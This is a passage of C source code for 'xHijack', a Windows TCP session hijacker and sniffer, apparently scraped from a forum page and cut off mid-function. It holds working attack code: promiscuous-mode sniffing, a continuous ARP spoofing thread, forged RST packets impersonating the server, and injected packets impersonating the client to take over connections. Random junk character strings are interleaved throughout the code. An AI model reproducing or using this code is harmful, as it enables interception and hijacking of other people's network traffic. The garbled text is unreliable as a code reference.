sizeof(szSelectAdapterName)-1); ! N0 n8 z( o" Z; [% q) Y5 ~ dwRet = GetAdaptersInfo(pAdapterInfo, &ulLen); * `7 J( s; R5 M5 F0 \4 |6 p! ~ if(dwRet != ERROR_BUFFER_OVERFLOW) % x& h- [3 t3 S! R3 Q { 2 S! X6 p1 G5 c4 @& d" j$ c" t printf("GetAdapterInfo error:%d\n", GetLastError()); , {. p7 C ~, ^4 D& `: T) ~! k return 0; } pAdapterInfo = (PIP_ADAPTER_INFO)malloc(ulLen); 8 B. v$ U: e$ i" [ v8 ] if(!pAdapterInfo) { ) d6 D, @2 S6 [: e: k2 Q i printf("malloc memory for pAdapterInfo error:%d\n", GetLastError()); V2 [$ G/ [$ I/ v( N* h) ? return 0; } dwRet = GetAdaptersInfo(pAdapterInfo, &ulLen); / \' ^& p! T6 s2 Q if(dwRet != ERROR_SUCCESS) y4 m! |8 [) L" A/ m5 \ { printf("GetAdapterInfo error:%d\n", GetLastError()); 1 S8 S: B9 _) l return 0; } 2 @& @2 s* d, d; r" f$ u pTmp = pAdapterInfo; ; g! @% x; f/ t8 L5 w; \- J8 a while(pTmp) : h+ L8 s! h" B { //字符匹配

韩冰

if(strstr(szSelectAdapterName, pTmp->AdapterName)) ' a5 N, G- y) z! \2 a2 W { //found it,get own adapter mac address memcpy(g_szOwnMAC, pTmp->Address, 6); //get ip address 8 k0 ?* U4 Z9 v* K7 E9 Q3 ] pIPAddr = &pTmp->IpAddressList; 2 K8 N) }* q) W- G. S3 h while(pIPAddr) { ( D% |; O# d1 e- l) s" A g_OwnIP[g_TotalIP++] = inet_addr((char *)&pIPAddr->IpAddress); 2 h7 U$ c7 x* u6 Q! l$ S pIPAddr = pIPAddr->Next; if(g_TotalIP >= Max_Num_IPAddr) break; : N0 s9 g; Z p } 3 j) \0 f! r, q% w0 Q break; / _2 n1 S# q+ \( j' g } 8 B) M/ L* H* o% q/ K: N pTmp = pTmp->Next; } free(pAdapterInfo); 8 ^& F: G$ a2 _ g* D. l& J //not found,return zero if( (!pTmp) || (!g_TotalIP) ) return 0; 4 M) z& ?. b a2 g. q1 O- A0 O //---------------------------------------------// 2 h. j/ B) G, L //open adapter lpAdapter = (LPADAPTER) PacketOpenAdapter((LPTSTR) AdapterList[iAdapter - 1]); if (!lpAdapter || (lpAdapter->hFile == INVALID_HANDLE_VALUE)) { iRetCode = GetLastError(); 4 a% ~- b! J4 s1 e: O printf("Unable to open the driver, Error Code : %lx\n", iRetCode); return 0; $ g2 I5 I7 Y2 t& ]" u } g l& b; y2 B2 E7 Q) h // set the network adapter in promiscuous mod - ^2 W- O9 f5 x# L if(PacketSetHwFilter(lpAdapter, NDIS_PACKET_TYPE_PROMISCUOUS) == FALSE) { & G% t P3 T/ Z% ~ p# Z printf("Warning: unable to set promiscuous mode!Try set ALL_LOCAL mode!\n"); r) E6 ^; M8 Y5 [ if(PacketSetHwFilter(lpAdapter, NDIS_PACKET_TYPE_ALL_LOCAL) == FALSE) { 8 J: r" @3 q% w% m printf("Unable to set ALL_LOCAL mode!\n"); 8 F8 f0 S- T: V return 0; } + P; m. s" `* i% j+ z } 4 g* m# F0 x) M4 M, Z3 B' x // set a 512K buffer in the driver 2 m0 v$ Z* K/ U7 G9 W0 {; ^8 @8 D if(PacketSetBuff(lpAdapter, 512000) == FALSE) 6 s7 b( a/ E9 e" h0 P, w% X { 6 F+ D2 A j) n" ~3 ~) g& \# u. }& P printf("Unable to set the kernel buffer!\n"); ' q( O- Z% t O% k' k- K$ C return 0; ) \ c g0 N) R! z+ }5 H } // set a 1 second read timeout if(PacketSetReadTimeout(lpAdapter, 1000) == FALSE) 3 y, C% z2 s& a& G' |) r& W printf("Warning: unable to set the read tiemout!\n"); if(PacketSetNumWrites(lpAdapter, 1) == FALSE) printf("warning: Unable to send more than one packet in a single write!\n"); //设置发送的packet ) H% j, \# k* M3 B g_lpSendPacket = PacketAllocatePacket(); & A3 |) ?; ^" X X) B4 ^/ F if(g_lpSendPacket == NULL) { " X5 ?+ W- X7 e6 Z, @ printf("Error:failed to allocate the LPPACKET structure for send packet.\n"); return 0; _6 A6 O* o* C9 A; d" O. {+ Q } 4 a0 p; }4 m6 } w5 o1 o6 j' e+ n! }! x ZeroMemory(g_szSendPacketBuf, sizeof(g_szSendPacketBuf)); PacketInitPacket(g_lpSendPacket, g_szSendPacketBuf, 1514); return lpAdapter; } # x9 V4 G3 ^9 T " c3 V0 @6 _3 e, [& {6 H//功能：帮助信息 void usage() { printf( "xHijack v1.0 -- multipurpose connection intruder / sniffer for windows 2000\n" "By eyas 2002/8/19\n" "http://www.ey4s.org\n" # \6 w0 W2 a" f1 p$ O) T9 h. q "Thanks to Refd0m and shotgun\n\n" "Usage: xHijack ServerSide ClientSide\n\n"); % }+ k# y' w* i- [4 a: p} 9 r! H+ S$ j% f o 0 y! f: v7 M: |- x9 g: `// ?" n/ e @" [ x: e3 r3 y9 R* ?//功能：显示数据包的一些详细信息 + Y) _3 C8 o! Z; t) ]// 9 u/ O2 g8 j# v. o; MVOID ShowPacketMoreInfo(PTCPPACKET pTCPPacket, USHORT usDataLen, BOOL bDetail) . _$ C: o- f1 h( J# F: G! |1 @; w{ SOCKADDR_IN saDest, saSrc; unsigned char FlagMask; int i; & E% ^1 w( P7 R5 ]$ J5 _* }7 O$ u / R3 r1 E8 ^9 o1 U saDest.sin_addr.s_addr = pTCPPacket->iphdr.destIP; 7 T7 }) _: C/ [. F. b saSrc.sin_addr.s_addr = pTCPPacket->iphdr.sourceIP; printf("\n%-15s:%-5d -> ", inet_ntoa(saSrc.sin_addr), ntohs(pTCPPacket->tcphdr.th_sport)); 8 e9 F; J8 J" a0 ?* n printf("%-15s:%-5d DataLen=%d ", inet_ntoa(saDest.sin_addr), ntohs(pTCPPacket->tcphdr.th_dport), usDataLen); * Z8 ]% F; F' G9 S9 |6 n! _ //display TCP flag . E" u* w6 Z1 j( `5 K0 d for( i=0, FlagMask=1; i<6; i++, FlagMask <<= 1) . w' }0 ^! p9 q" v/ a { if((pTCPPacket->tcphdr.th_flag) & FlagMask) printf("%c", g_szTcpFlag); else printf("-"); } , r6 s/ \, @/ M' h$ t printf("\n"); ; O A) @" z( Z0 N //如有需要，可显示更多详细的信息 if(bDetail) printf("SEQ=%.8X ACK=%.8X\n",ntohl(pTCPPacket->tcphdr.th_seq), ntohl(pTCPPacket->tcphdr.th_ack)); } / f- ]# R" l9 K' F3 ?2 K 6 {9 R; e2 w$ l `# k. b// //功能：处理收到的数据包(只分析本不属于自己的包)，然后根据用户输入，完成各种功能 // ( i' X% o h4 A3 S) _* s9 {DWORD WINAPI AnalysePacketsThread(LPVOID lp) 1 b- S+ j j& e' p. I& ^ p{ * K( N4 p% C( g6 d- Z ULONG ulBytesReceived; USHORT usDataLen; //USHORT usIPHeadLen, usTCPHeadLen; 5 C% n% K# z! D6 a4 Y' p char *buf; % j0 l# ?1 `% V8 ~" j: y u_int off, i; ( b$ O6 i, Z. ^. C" a" d PTCPPACKET pTCPPacket; " _. ^% N2 C: J$ }0 S( l4 W struct bpf_hdr *hdr; ' {8 l4 p7 ?/ s) r LPPACKET lpRecvPacket; char szPacketBuf[256000], *pStr; 5 v2 V3 A+ g) B% o1 R9 u BOOL bDeleteNode, bAddNew; DWORD ident;//当前所处理的数据包，所属的连接的唯一标识 6 w7 w1 J6 A. ^ R; W BOOL bClientToServer;//数据包是否从客户端发送到服务器端 5 M2 I& c6 i+ N: L //设置接收的packet $ f S4 x; ?% x1 ^ ]/ c, L lpRecvPacket = PacketAllocatePacket(); if(lpRecvPacket == NULL) ' y5 C( t0 G. p { . O1 f! d* q: {7 V printf("Error:failed to allocate the LPPACKET structure for recv.\n"); & a" ]# A- \2 d9 x return 0; * ?! Q5 l1 H' A( L } ZeroMemory(szPacketBuf, sizeof(szPacketBuf)); PacketInitPacket(lpRecvPacket, szPacketBuf, 256000); while(1) 6 S, G, l' j8 W( c+ |4 {0 K5 f { / v1 P3 O3 A0 {: }& H // capture the packets m9 [- O( j. n, h' H) { if(PacketReceivePacket(g_lpAdapter, lpRecvPacket, TRUE) == FALSE) / n/ {+ o9 V: \1 V8 d& f5 |2 W { printf("Error: PacketReceivePacket failed.\n"); $ q `9 n1 e- d- W break; / ^: b# [( r1 O( \. u4 S% j' ? } / M) u: I. {% u& X7 T/ h O ulBytesReceived = lpRecvPacket->ulBytesReceived; : [! ]3 P( @' P1 {" n- g; k buf = lpRecvPacket->Buffer; / Q6 {6 Q, w' E6 K1 D off = 0; 8 L2 f% s9 w) h# }! t while(off < ulBytesReceived) { hdr = (struct bpf_hdr *)(buf + off); off += hdr->bh_hdrlen; pTCPPacket = (PTCPPACKET)(buf + off); off = Packet_WORDALIGN(off + hdr->bh_caplen); //不需要处理自己发出的包(转发或本机发送的) if(memcmp(pTCPPacket->ehhdr.SourceMAC, g_szOwnMAC, 6) == 0) continue; //检查是否IP包 5 C! K, M) m' ?& C8 l; L, b) ? if(pTCPPacket->ehhdr.EthernetType != htons(EPT_IP)) continue; : H6 M- K: ]% c" r/ x //检查是否TCP包 3 D, Y* _3 j. @0 Y% F' H8 ` if(pTCPPacket->iphdr.proto != IPPROTO_TCP) continue; 6 ?- y0 y: Z/ l5 i //也不处理DestIP是自己的包 for(i=0; i

韩冰

pTCPPacket-&gt;iphdr.sourceIP, pTCPPacket-&gt;tcphdr.th_sport, TRUE, FALSE);
            //reset action flag
            ResetActionAllFlag();
          }
2 d1 q9 ^: Z6 F: p. }          //start hijack
          else if(g_dwAction == ACTION_HIJACK)
* T& ~) ]  J; X' x: r5 s          {
            //send rst packet to client
" }3 _( p0 P- t5 \6 u4 d            SendRstPacket(pTCPPacket-&gt;tcphdr.th_ack, pTCPPacket-&gt;tcphdr.th_seq);
            //send hijack packet to client
            SendHiJackPacket(pTCPPacket);
            //reset action flag
+ g  ?- L- Z6 i) ~% x& a            ResetActionAllFlag();
          }
8 g. w- `- l6 G7 I, u        }
6 }" h, M& f% s& V6 N. S, L  f, p0 {        //show the tcp data
: ~) L+ A4 a' J1 \% `, O. N        if( (g_dwAction == ACTION_WATCH) &amp;&amp; (usDataLen) )
        {
. D( E; {/ H- M. U" ]( w: H          ShowPacketMoreInfo(pTCPPacket, usDataLen, FALSE);
2 l0 z* [& }$ E- W          //暂不考虑IP、TCP头不是20字节的情况
          //pStr = (char *)pTCPPacket + sizeof(EHHDR) + usIPHeadLen + usTCPHeadLen;
! J' h7 P' v4 u% T4 s* Z% \; k          pStr = (char *)pTCPPacket + 54;
          for(i=0; i        }
      }
' ^4 c3 n1 D" R! g$ w      //debug output
$ h) Y% J7 |# k. S      //ShowPacketMoreInfo(pTCPPacket, usDataLen, TRUE);
% B. o! p8 ]2 Q" _    }//end of analyse packets while
$ m( u% j7 F6 e  }//end of recv packets while
  PacketFreePacket(lpRecvPacket);
& l$ B1 f- k/ S+ g* X  return 0;
% K# r5 C4 B, F$ p}
! }, w7 F. L) x( q+ H" B

* T9 n% O8 i( L# C7 X9 ~& m//
//功能：操作记录所有连接信息的单向链表
" `+ N' ?8 Z* H8 G# Z//
' a. a5 i3 j7 ^* D3 D( BDWORD CtrlConnInfoLink(DWORD dwServerIP, USHORT uServerPort, DWORD dwClientIP,
: `7 N7 h8 k& B            USHORT uClientPort, BOOL bDelete, BOOL bAddNew)
0 {. h/ [. L) K8 D{
1 R: f) [0 y" J1 Z  PCONNINFO  pNew, pTmp;

+ T+ s) Q: @* d- z  pTmp = g_pConnHead;
  while(pTmp)
  {
    if(pTmp-&gt;bActive)
    {
      //found it
      if( (pTmp-&gt;dwServerIP == dwServerIP) &amp;&amp;
        (pTmp-&gt;uServerPort == uServerPort) &amp;&amp;
/ _' X5 }1 v; ^2 [. T& z        (pTmp-&gt;dwClientIP == dwClientIP) &amp;&amp;
1 c4 }" [! j0 w7 x( w        (pTmp-&gt;uClientPort == uClientPort) )
      {
        if(bDelete)
        {
9 K$ d8 [; H8 Z: t2 `- v          pTmp-&gt;bActive = FALSE;
          return 0;
        }
$ `" o% |; y: `# e        else return pTmp-&gt;ident;
4 v: {8 L# E, T# M6 V( N' ?      }
2 F& r7 e1 \, r* R' g# K/ j: v    }
7 t; {* C# S8 A& ?# }" L! P+ Q    pTmp = pTmp-&gt;Next;
' r  P2 C8 e+ Y( k4 `% o( Z. S  }
; |5 d+ ~- T! ^, k3 ]9 U( [7 B  //not found, create new node
  if( (!pTmp) &amp;&amp; (!bDelete) &amp;&amp; (bAddNew) )
  {
    //search unactive note
    pTmp = g_pConnHead;
    while(pTmp)
# ?0 k4 a& Y  U' M$ C# n    {
# B8 r# w% B* l8 z2 _' @! e: p      if(!pTmp-&gt;bActive) break;
      pTmp = pTmp-&gt;Next;
  w3 K. N0 I, v% u9 Y    }
& p7 o: m% l5 H' d* V/ s    //found a unactive node
    if(pTmp)
    {
+ j) {, R# l7 D7 E; x5 }      pTmp-&gt;dwServerIP = dwServerIP;
( I0 e0 D8 B+ M7 i8 D) V      pTmp-&gt;uServerPort = uServerPort;
      pTmp-&gt;dwClientIP = dwClientIP;
      pTmp-&gt;uClientPort = uClientPort;
  {6 n7 D+ T  |' |      pTmp-&gt;bActive = TRUE;
% _7 Y9 ~8 B9 W& v6 _      return pTmp-&gt;ident;
    }
    //not found,create new node
    pNew = (PCONNINFO)malloc(sizeof(CONNINFO));
    if(!pNew)
5 o$ @) {2 t/ q" V6 s& ^    {
      printf("malloc for link node error:%d\n", GetLastError());
7 l. s$ m8 j6 Z& d6 J: x      return 0;
    }
8 c3 X. I2 l- l6 l    //fill the struct
    pNew-&gt;bActive = TRUE;
1 @) t) }1 c! k9 G8 q# G, U) F    pNew-&gt;dwServerIP = dwServerIP;
0 N4 U) p, d# O: |    pNew-&gt;uServerPort = uServerPort;
    pNew-&gt;dwClientIP = dwClientIP;
    pNew-&gt;uClientPort = uClientPort;
    pNew-&gt;ident = ++g_ident;
    pNew-&gt;Next = NULL;
% C# {& L2 J7 q6 H' m! S3 G1 g    //add new node to link
    if(!g_pConnHead)
      g_pConnHead = g_pConnLast = pNew;
/ m' K7 a! @9 K! S! G    else
0 t2 f, T. w" P9 x' N    {
8 `. B8 u" K/ n- }( r      g_pConnLast-&gt;Next = pNew;
$ J2 p$ ^4 w, W& |1 x: a  C      g_pConnLast = pNew;
    }
    return pNew-&gt;ident;
( j! u! j7 c- e  }
  return 0;
2 g" p5 s# ], {) l$ m}
/ q  h, l. O8 ^
//
//功能：判断一个数据包是不是只有ACK标志
8 c9 w/ s3 U4 N" a3 J" q, ^//
3 D& r# `! n' ?2 NBOOL IsACKPacket(unsigned char flag)
{
8 ?  S) \% M, |  ]' |& @6 w  int  i, j=1;
9 ?2 V9 S5 N& s1 y2 ?0 f  for(i=0 ; i&lt;4; i++)
  {
. c/ j+ J! w6 t5 ?) p/ ?+ ?    if(flag &amp; j) return FALSE;
2 b. }2 Y" R& O    j &lt;&lt;= 1;
  }
, U  _0 B9 D, |7 a# B; s6 m; }( f  if(!(flag &amp; 0x10)) return FALSE;//is ack?
  if(flag &amp; 0x20) return FALSE;
  return TRUE;
6 E$ Y3 \$ X' B- |: l* b5 I}

//
//功能：伪装成Client给Server发送数据包
//
& t* Q! ?6 y$ LBOOL SendHiJackPacket(PTCPPACKET pTempletPacket)
8 R: X' V1 H9 i- Y{

1 G8 [  w! m- R' y  O  char    szBuff[1520];
' _. P2 q. _; k, a- u+ O( e0 ?# v  PSDHDR    psdhdr;
  PTCPPACKET  pHiJackPacket = NULL;
  BOOL    bRet = FALSE;

# A  J4 I/ t- T  N  __try
  {
    //
3 X# U5 S5 j% W. Q  `    if(!g_pCurrCtrlConn) __leave;
    //allocate memory for hijack packet
2 p9 `6 I1 H1 l1 H# A6 r    pHiJackPacket = (PTCPPACKET)malloc(sizeof(TCPPACKET));
5 u2 m2 a9 W  U! I2 o7 `4 c1 h9 W    if(!pHiJackPacket)
9 Z% m9 i, y# \" {3 K( T8 t9 E    {
2 H- M) ?# v2 b4 b      printf("malloc error:%d\n", GetLastError());
$ Z) P' \: Q3 h/ x      __leave;
    }
    memcpy(pHiJackPacket, pTempletPacket, sizeof(TCPPACKET));
% l$ e6 {- X& g: t    //-------------- modify the packet ---------------//
    //modify ethernet head
    memcpy(pHiJackPacket-&gt;ehhdr.DestMAC, g_szServerSideMAC, 6);
    memcpy(pHiJackPacket-&gt;ehhdr.SourceMAC, g_szOwnMAC, 6);
' L% O/ p! M* ]8 x    //modify ip head
" ]4 \& m1 W3 K. q    pHiJackPacket-&gt;iphdr.h_verlen = (4&lt;&lt;4 | sizeof(IPHDR)/sizeof(unsigned long));
! V& _0 Z3 }1 w+ V6 d+ J/ W8 m    pHiJackPacket-&gt;iphdr.total_len = htons(sizeof(IPHDR)+sizeof(TCPHDR)+strlen(g_szCommand));
; U/ a, M" e5 x) T* c    pHiJackPacket-&gt;iphdr.ident += 1;//标识加1
8 Z: t1 y' B3 y    pHiJackPacket-&gt;iphdr.checksum = 0;
' u9 y$ o7 S8 g. `4 g    pHiJackPacket-&gt;iphdr.sourceIP = g_pCurrCtrlConn-&gt;dwClientIP;//源IP地址，伪装成client
  H" d- N, c2 X' X: f    pHiJackPacket-&gt;iphdr.destIP = g_pCurrCtrlConn-&gt;dwServerIP;//目的IP地址，接收hijack包的地址
0 [# w/ o- `# |9 ]# s. }. J9 J* ?6 B    //modify tcp head
    pHiJackPacket-&gt;tcphdr.th_sport = g_pCurrCtrlConn-&gt;uClientPort;//client's port
    pHiJackPacket-&gt;tcphdr.th_dport = g_pCurrCtrlConn-&gt;uServerPort;//server's port
& s- e! c1 ^9 r9 _+ g# b    pHiJackPacket-&gt;tcphdr.th_lenres = (sizeof(TCPHDR)/4 &lt;&lt; 4 | 0);
$ O6 F9 b7 O& ]- J1 i    pHiJackPacket-&gt;tcphdr.th_flag = 0x18;// PA
" v3 K6 V4 y( g9 d5 B/ l2 z    pHiJackPacket-&gt;tcphdr.th_sum = 0;
" o6 D- k" R% K8 F  p; a    pHiJackPacket-&gt;tcphdr.th_win = 0x3F44;
* A7 ~2 H8 u5 A  {& T# `9 g    //fill tcp psd head
' a! ~9 P2 y& a8 M( s# }7 E) ?; @    psdhdr.saddr = pHiJackPacket-&gt;iphdr.sourceIP;           
: M( a/ z! r7 v* z    psdhdr.daddr = pHiJackPacket-&gt;iphdr.destIP;           
7 v1 d. F1 Z4 o9 m! k4 ~    psdhdr.mbz = 0;
    psdhdr.ptcl = IPPROTO_TCP;
1 w, r7 }0 g" ?% O% {; h    psdhdr.tcpl = htons(sizeof(TCPHDR) + strlen(g_szCommand));//tcp head + data len
# ?$ `# z4 O( O: @    //calculate tcp checksum     
    memcpy(szBuff, &amp;psdhdr, sizeof(PSDHDR));   
    memcpy(szBuff + sizeof(PSDHDR), &amp;pHiJackPacket-&gt;tcphdr, sizeof(TCPHDR));
) a5 ]! A' P7 P8 v2 K0 K& _    memcpy(szBuff + sizeof(PSDHDR) + sizeof(TCPHDR), g_szCommand, strlen(g_szCommand));
5 b6 d& q+ w' J3 M5 p    pHiJackPacket-&gt;tcphdr.th_sum = checksum((USHORT *)szBuff, sizeof(PSDHDR) + sizeof(TCPHDR) + strlen(g_szCommand));
& A% x+ x7 e* Z2 u9 _    //calculate IP checksum
, d1 n' J6 _3 j7 C6 M1 z- B* I+ q1 X    pHiJackPacket-&gt;iphdr.checksum = checksum((USHORT *)&amp;pHiJackPacket-&gt;iphdr, sizeof(IPHDR));
    //fill send buffer           
    memcpy(szBuff, (char *)pHiJackPacket, sizeof(TCPPACKET));
6 v. p. z+ ^" a0 @, }+ h    memcpy(szBuff + sizeof(TCPPACKET), g_szCommand, strlen(g_szCommand));
, t2 Q8 r7 K8 q; }3 ~    memset(szBuff + sizeof(TCPPACKET) + strlen(g_szCommand), 0, 4);
    memset(g_lpSendPacket-&gt;Buffer, 0, 1514);
& R/ M  B5 L) K0 V- A+ T' U4 \    memcpy(g_lpSendPacket-&gt;Buffer, szBuff, sizeof(TCPPACKET) + strlen(g_szCommand));
( z% Z# A2 J/ B6 d; p' e    if(PacketSendPacket(g_lpAdapter, g_lpSendPacket, TRUE) == FALSE)
    {
      printf("Error sending the hijack packets!\n");
      __leave;
    }
    else printf("Send hijack packet ok!\n");
    bRet = TRUE;
  e0 B7 }9 O% G/ {% L, q  }

韩冰

__finally
  {
/ P* @* t/ ]. p0 Z: F- e5 x6 p    if(pHiJackPacket) free(pHiJackPacket);
# J" W; Q$ f: j  }
- p$ F  X/ Q% T" s$ S3 Z9 X  return bRet;
}


//
//功能：伪装成Server给Client发送rst包
) F0 E5 s$ z! C//
BOOL SendRstPacket(unsigned int seq, unsigned int ack)
{
  char    szBuff[60];
  PSDHDR    psdhdr;
+ t6 W4 W+ n5 \9 H. f  PTCPPACKET  pTcpPacket = NULL;
  BOOL    bRet = FALSE;

7 ^) j7 c& `7 g3 @  __try
  {
    //检查当前指向想控制的连接的信息的指针是否为空
    if(!g_pCurrCtrlConn) __leave;
    //allocate memory for rst packet
    pTcpPacket = (PTCPPACKET)malloc(sizeof(TCPPACKET));
    if(!pTcpPacket)
+ q9 q6 y6 y/ @, v    {
0 Z; a0 k. e( Z      printf("malloc error:%d\n", GetLastError());
0 G. G  t: x. e% L: {- ^      __leave;
    }
    //fill ethernet head
    memcpy(pTcpPacket-&gt;ehhdr.DestMAC, g_szClientSideMAC, 6);
    memcpy(pTcpPacket-&gt;ehhdr.SourceMAC, g_szOwnMAC, 6);
    pTcpPacket-&gt;ehhdr.EthernetType = htons(EPT_IP);
- [6 B. m' ]  d2 f    //fil ip head
; C- k( m. c& e7 _* y2 U    pTcpPacket-&gt;iphdr.h_verlen = (4&lt;&lt;4 | sizeof(IPHDR)/sizeof(unsigned long));
6 l' s+ _+ X" J" L4 T/ ^    pTcpPacket-&gt;iphdr.tos = 0;
    pTcpPacket-&gt;iphdr.total_len = htons(sizeof(IPHDR)+sizeof(TCPHDR));
    pTcpPacket-&gt;iphdr.ident = 1;
    pTcpPacket-&gt;iphdr.frag_and_flags = 0;
    pTcpPacket-&gt;iphdr.ttl = 128;
    pTcpPacket-&gt;iphdr.proto = IPPROTO_TCP;
7 M3 P+ b% ~2 z1 p& V    pTcpPacket-&gt;iphdr.checksum = 0;
    pTcpPacket-&gt;iphdr.sourceIP = g_pCurrCtrlConn-&gt;dwServerIP;//源IP地址，伪装成服务器的
    pTcpPacket-&gt;iphdr.destIP = g_pCurrCtrlConn-&gt;dwClientIP;//接收此rst包的ip地址
1 g+ m) u4 X$ d8 ?6 B# R    //fill tcp head
    pTcpPacket-&gt;tcphdr.th_sport = g_pCurrCtrlConn-&gt;uServerPort;//源端口号，伪装成服务器的端口
# \' e0 E" n" _( R5 W/ q" U- i& Q    pTcpPacket-&gt;tcphdr.th_dport = g_pCurrCtrlConn-&gt;uClientPort;//接收此rst包的端口
$ n. k6 Q5 F8 `    pTcpPacket-&gt;tcphdr.th_seq = seq;//SYN
    pTcpPacket-&gt;tcphdr.th_ack = ack;//ACK
# P) O* B' N5 e2 T    pTcpPacket-&gt;tcphdr.th_lenres = (sizeof(TCPHDR)/4&lt;&lt;4|0);
    pTcpPacket-&gt;tcphdr.th_flag = 4;//RST flag
& z& H8 g8 |5 j3 Q    pTcpPacket-&gt;tcphdr.th_win = 0;
% {/ o# J3 k3 o3 Z    pTcpPacket-&gt;tcphdr.th_urp = 0;
. R( b# |5 c* w! }0 y1 [    pTcpPacket-&gt;tcphdr.th_sum = 0;
    //fill tcp psd head
* U& _/ }* x+ k    psdhdr.saddr = pTcpPacket-&gt;iphdr.sourceIP;           
# [. V3 b; \" G! N' r    psdhdr.daddr = pTcpPacket-&gt;iphdr.destIP;           
    psdhdr.mbz = 0;
    psdhdr.ptcl = IPPROTO_TCP;
) t8 s1 b/ H( ^) j. N' X* u    psdhdr.tcpl = htons(sizeof(TCPHDR));
    //calculate tcp checksum     
3 q" ?; N2 L2 q% j4 P    memcpy(szBuff, &amp;psdhdr, sizeof(PSDHDR));   
    memcpy(szBuff + sizeof(PSDHDR), &amp;pTcpPacket-&gt;tcphdr, sizeof(TCPHDR));
    pTcpPacket-&gt;tcphdr.th_sum = checksum((USHORT *)szBuff, sizeof(PSDHDR) + sizeof(TCPHDR));
+ o+ Y" i7 p$ y. I% H    //calculate IP checksum
    pTcpPacket-&gt;iphdr.checksum = checksum((USHORT *)&amp;pTcpPacket-&gt;iphdr, sizeof(IPHDR));
; _* r6 H+ W% i6 [  S/ v    //fill send buffer
) l# Y' j0 r& P. q( [( C& t0 o; @    memset(g_lpSendPacket-&gt;Buffer, 0, 1514);
5 n# @2 G, M, V. x2 M) Y8 s7 b4 [+ F    memcpy(g_lpSendPacket-&gt;Buffer, (char *)pTcpPacket, sizeof(TCPPACKET));
    if(PacketSendPacket(g_lpAdapter, g_lpSendPacket, TRUE) == FALSE)
8 ]! D% t6 e/ b$ m5 U% _    {
      printf("Error sending the rst packets!\n");
5 Q: f, V4 `7 D- e9 z0 S# ~      __leave;
    }
4 [/ H) ~1 n( J; q1 M1 e    else printf("Send RST packet ok!\n");
9 y& U$ I6 z( E3 ?& H! T    bRet = TRUE;
  }
  __finally
  {
    if(pTcpPacket) free(pTcpPacket);
! @# e8 S8 H8 ?7 u9 ^% I  }
7 B5 k  q7 u& f  V  return bRet;
}
: _! ?6 Z, a5 M$ a4 H; ?* g; ]
1 a! J$ U. r! R6 a7 l//
//功能：计算校验和
//
USHORT checksum(USHORT *buffer, int size)
{
$ p+ J& {1 e% T, i7 A0 i; O unsigned long cksum=0;
while(size &gt;1) {
  cksum+=*buffer++;
6 o5 e$ [5 v. O  size -=sizeof(USHORT);
}
( F8 O' i' [. y; C" C9 |- q  u if(size ) {
  cksum += *(UCHAR*)buffer;
}
! g; ?$ M% K5 C6 X$ _1 j: f cksum = (cksum &gt;&gt; 16) + (cksum &amp; 0xffff);
cksum += (cksum &gt;&gt;16);
return (USHORT)(~cksum);
& r9 S" K) R3 j( c4 I9 l, d% g9 d}
0 X! a6 {0 \/ M# y# h% f! [# _
- |: R; B" H' \6 f; X: A//
//功能:实施ARP欺骗
//1 告诉ServerSide,ClientSide的mac是ownmac
7 D+ {+ ?3 ]( x% w6 s//2 告诉ClientSide,ServerSide的mac是ownmac
//
DWORD WINAPI ArpSpoofThread(LPVOID lpType)
! \: R3 [. J3 ]& m7 r! p{
  int  iType = *(int *)lpType;
  ARPPACKET  ArpPacket;
! m! X$ @9 ]* K! F; L2 X  LPPACKET  lpArpPacket;
/ O& q6 ?# B3 U) c, H7 j2 x  char    szArpBuff[60];
" e$ y' X) w% w0 ~
! x0 l5 S7 n& ~* Z  switch(iType)
; U8 k2 M; H2 n+ o2 {; m  {
3 C1 [: t" `+ T8 J2 q    case 1:
- g) }) I$ l4 B# P  T* Q9 j      memcpy(ArpPacket.ehhdr.DestMAC, g_szServerSideMAC, 6);
- b' G' A/ r" D" H4 J# u# B      ArpPacket.arphdr.DestIP = g_ServerSideIP;
3 s3 j8 X6 H: J- W! Y9 e2 V      ArpPacket.arphdr.SourceIP = g_ClientSideIP;
( X$ z% F9 B( B6 L! N9 _$ s      break;
+ L! s+ w4 y6 B8 Q# v    case 2:
      memcpy(ArpPacket.ehhdr.DestMAC, g_szClientSideMAC, 6);
      ArpPacket.arphdr.DestIP = g_ClientSideIP;
      ArpPacket.arphdr.SourceIP = g_ServerSideIP;
      break;
    default:
" m$ C/ {- N; M" _: C/ O      return 0;
  }
$ I! a% ~! G4 z0 D% t  Q& n  //ethernet head
7 b; F# u. P' D2 X0 w  memcpy(ArpPacket.ehhdr.SourceMAC, g_szOwnMAC, 6);
3 Z& C: B& x" Z: K3 s5 H+ {; k  ArpPacket.ehhdr.EthernetType = htons(EPT_ARP);//ethernet type
  //arp head
  memcpy(ArpPacket.arphdr.DestMAC, ArpPacket.ehhdr.DestMAC, 6);//dest's mac
  memcpy(ArpPacket.arphdr.SourceMAC, g_szOwnMAC, 6);//sender's mac
  ArpPacket.arphdr.HrdAddrlen = 6;
5 s4 e5 ]5 @. `+ \! m; \  ArpPacket.arphdr.ProAddrLen = 4;
  ArpPacket.arphdr.HrdType = htons(ARP_HARDWARE);
8 y+ T9 [" f0 x7 v  ArpPacket.arphdr.ProType = htons(EPT_IP);
$ V+ i" m2 T& G' u6 V5 z. u5 ~  ArpPacket.arphdr.op = htons(2);//arp reply
5 L$ k. m" a7 y+ ?: P  J. J
  lpArpPacket = PacketAllocatePacket();
  if(lpArpPacket == NULL)
5 t' @5 I* [! J! Y, r  {
, Q/ x# G6 o9 A* e& W3 c) p    printf("Error:failed to allocate the LPPACKET structure for Arp spoof.\n");
5 \0 }' l. }+ j    return 0;
& z3 a2 N7 _1 J! V  }
  memset(szArpBuff, 0, sizeof(szArpBuff));
. p4 K/ T1 L# M6 M6 T9 u  memcpy(szArpBuff, (char *)&amp;ArpPacket, sizeof(ARPPACKET));
  PacketInitPacket(lpArpPacket, szArpBuff, 60);
  //send arp packet
; S; m; p4 z5 e: q+ r! k" N& v  while(1)
0 ?9 [7 ^7 _/ _  {
    if(PacketSendPacket(g_lpAdapter, lpArpPacket, TRUE) == FALSE)
    {
      printf("Error sending the arp spoof packets!\n");
- O6 z( k) f0 L+ I: I& ]* [      return 0;
    }
    Sleep(1000);
1 x0 [0 ~% i9 n% E9 ?( ^" A7 |( Y7 s  }
, T* d- |, D5 H" V4 |! z  return 0;
}

$ m! S$ i  }( P/ z% V3 O" |( V//
' |' H5 T0 |( P& ~& N& }//功能：输入IP取得对应的MAC地址
. U% C+ M. K- l4 C7 q//
& f& ^! ?3 \% \5 P! Z: a0 hBOOL GetMACAddr(DWORD DestIP, char *pMAC)
{
